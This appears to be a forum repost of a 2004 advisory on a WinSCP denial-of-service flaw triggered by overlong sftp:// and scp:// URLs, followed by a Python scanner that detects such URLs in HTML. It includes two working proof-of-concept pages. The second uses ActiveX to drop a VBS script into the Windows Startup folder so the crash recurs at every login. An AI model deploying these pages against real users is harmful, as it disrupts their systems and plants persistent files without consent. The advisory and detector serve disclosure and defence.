Full Version: Winscp Denial Of Service
qcred11
Apr 29 2004, 04:25 AM
QUOTE


WinSCP Denial of Service
------------------------------------------------------------------------


SUMMARY

<http://winscp.sourceforge.net> WinSCP is "an open source SFTP (SSH File
Transfer Protocol) and SCP (Secure CoPy) client for Windows using SSH
(Secure SHell). Its main function is safe copying of files between a local
and a remote computer". A malicious attacker can send an email containing
a link that will cause WinSCP to crash.

DETAILS

Vulnerable Systems:
* WinSCP version 3.5.6 (prior versions might also be vulnerable)

The default installation of WinSCP provides the user with functionality to
handle sftp:// and scp:// addresses. The vulnerability exists due to the
way the application handles long URLs. A malformed scp:// or sftp://
address embedded in an HTML tag causes the WinSCP application to exhaust
CPU and Memory resources. The attacker would need the ability to convince
the user to visit a web site he controlled or open an HTML e-mail he
had prepared. During the denial of service, WinSCP will not display any
GUI.

Proof of Concept:
------ WinSCP_DoS1.html --------

<HTML>
<HEAD>
<TITLE>WinSCP DoS</TITLE>

<meta http-equiv="Refresh" content="0; URL=sftp://AAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">

</HEAD>
<BODY>
</BODY>
</HTML>

-------- WinSCP_DoS2.html -------

<html>
  <head>
  <title>WinSCP DoS</title>

<script language="JScript">

    var WshShell = new ActiveXObject("WScript.Shell");
    strSU = WshShell.SpecialFolders("StartUp");

    var fso = new ActiveXObject("Scripting.FileSystemObject");
    var vibas = fso.CreateTextFile(strSU + "\\WinSCPDoS.vbs",true);

    vibas.WriteLine("Dim shell");
    vibas.WriteLine("Dim quote");
    vibas.WriteLine("Dim DoS");
    vibas.WriteLine("Dim param");
    vibas.WriteLine("DoS = \"C:\\Programmi\\WinSCP3\\WinSCP3.exe\"");
    vibas.WriteLine("param = \"scp://AAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"");
    vibas.WriteLine("set shell =
WScript.CreateObject(\"WScript.Shell\")");
    vibas.WriteLine("quote = Chr(34)");
    vibas.WriteLine("pgm = \"explorer\"");
    vibas.WriteLine("shell.Run quote & DoS & quote & \" \" & param");

    vibas.Close();

    </script>

  </head>
</html>


ADDITIONAL INFORMATION

The information has been provided by <mailto:luca.e@seeweb.it> Luca
Ercoli.
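
A mail or web gateway check for the condition the advisory describes, as an added example that is not part of the original advisory or post: it flags sftp:// and scp:// URLs in HTML attributes and meta refresh targets that exceed a length limit. The 256-character limit and all names are assumptions; the advisory does not state the length that triggers the crash.

```python
import re
from html.parser import HTMLParser

# Assumption: the advisory gives no exact trigger length, so this is a
# conservative policy limit for handler URLs, not a measured threshold.
MAX_URL_LEN = 256
SCHEMES = ("sftp://", "scp://")
URL_ATTRS = {"href", "src", "action", "data"}
# A meta refresh value looks like "0; URL=sftp://host/path".
REFRESH_RE = re.compile(r"url\s*=\s*(.+)", re.I | re.S)


class HandlerUrlScanner(HTMLParser):
    """Record sftp:// and scp:// URLs longer than MAX_URL_LEN."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []  # (tag, attribute, scheme, url_length)

    def handle_starttag(self, tag, attrs):
        attrs = [(k, v) for k, v in attrs if v]
        refresh = any(k == "http-equiv" and v.strip().lower() == "refresh"
                      for k, v in attrs)
        for name, value in attrs:
            if tag == "meta" and name == "content" and refresh:
                match = REFRESH_RE.search(value)
                if match:
                    self._check(tag, name, match.group(1))
            elif name in URL_ATTRS:
                self._check(tag, name, value)

    def _check(self, tag, attr, url):
        # Long values are often line-wrapped in transit; measure unwrapped.
        url = re.sub(r"\s+", "", url).strip("'\"")
        for scheme in SCHEMES:
            if url.lower().startswith(scheme) and len(url) > MAX_URL_LEN:
                self.findings.append((tag, attr, scheme, len(url)))


def scan_html(html):
    scanner = HandlerUrlScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed samples: an oversized refresh target (wrapped) and a normal link.
SAMPLE_BAD = ('<html><head><meta http-equiv="Refresh" content="0; URL=sftp://'
              + "A" * 300 + "\n" + "A" * 300 + '"></head></html>')
SAMPLE_OK = '<a href="sftp://files.example.org/pub/">mirror</a>'
```

The scanner inspects markup attributes only; a URL passed to the client from script, as in the second proof of concept, is outside what it sees.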
